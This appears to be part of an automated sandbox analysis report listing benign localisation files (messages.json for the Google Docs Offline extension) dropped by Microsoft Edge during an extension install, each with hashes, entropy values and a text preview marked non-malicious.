Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
